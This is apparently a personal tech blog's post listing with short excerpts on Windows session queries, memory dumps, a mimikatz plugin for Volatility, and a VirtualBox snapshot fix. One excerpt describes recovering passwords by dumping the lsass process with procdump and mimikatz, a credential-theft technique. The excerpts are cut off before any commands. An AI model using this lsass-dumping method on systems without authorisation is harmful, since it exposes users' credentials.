All posts by Michael Albert

Windows: List all users who are currently logged on


if you want to list all Users which are currently logged on to the box use the query command.

List all sessions

c:\> query session
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console                                     1  Conn
>rdp-tcp#0         user1                     2  Active  rdpwd
 rdp-tcp                                 65536  Listen

Or list all users

c:\> query user
>user1                 rdp-tcp#0           2  Active          .  21.02.2015 19:42

You can also list the processes of the user

c:\> query process
 USERNAME              SESSIONNAME         ID    PID  IMAGE
>user1                 rdp-tcp#0            2   6076  taskhost.exe
>user1                 rdp-tcp#0            2   6592  rdpclip.exe
>user1                 rdp-tcp#0            2   4840  dwm.exe
>user1                 rdp-tcp#0            2   4680  explorer.exe
>user1                 rdp-tcp#0            2   7092  vmtoolsd.exe


Security: Install mimikatz offline plugin to volatility (DRAFT!!!)


here are the steps to install the mimikatz offline plugin to get it running under volatility on a Windows 7 x64 Operating system. Currently draft but works for me.

1. Install volatility
get the latest Python 2 Version and install it. In this example to target directory d:\Python27. Use the x86, 32Bit Version even on x64 systems. Otherwise the volatility installer won’t found the python installation. Choose also a installpath without spaces.

Install Volatility 2.4 Windows Python Module Installer (not the binary installer)
Continue reading Security: Install mimikatz offline plugin to volatility (DRAFT!!!)

Windows: Initate a kernel memory dump


for deeper inspection of Windows it is sometimes necessary to get a memory dump of the machine to analyse these output with tools like volatility .

There are several ways to provoke windows to write a dump.
Continue reading Windows: Initate a kernel memory dump

Windows: Recover lost passwords from memory


if a User is logged on and forget it’s password you can dump to lsa process and recover the password from a dump file.

Two tools are needed:

  • Microsoft’s sysinternals procdump
  • mimikatz. A tool to play with windows security. Take care when download precompiled binaries. Better get the source code from github and compile it yourself.  Its very easy

Lets start. Login as a User with administrator permissions and dump the lsass process
Continue reading Windows: Recover lost passwords from memory

Virtualbox: VM does not start after creating a snapshot. EFail (0x80004005)


when using vhd disks or when you convert other  disk formats (vmdk, vhd)  to vdi and you create  a snapshot, the virtual machine won’t boot.

An error occurs while starting the vm:

Fehlercode: E_FAIL (0x80004005)
Component: ProgressProxy
Interface: IProgress {c20238e4-3221-4d3f-8891-81ce92d9f913}

In this case the manager for virtual medias shows an error that the parent UUID of the snapshot file does not matches the UUID of parent medium stored in the media registry c:\Users\Username\.virtualbox\VirtualBox.xml.

This can be fixed 🙂 Get the UUID of the parent disk
Continue reading Virtualbox: VM does not start after creating a snapshot. EFail (0x80004005)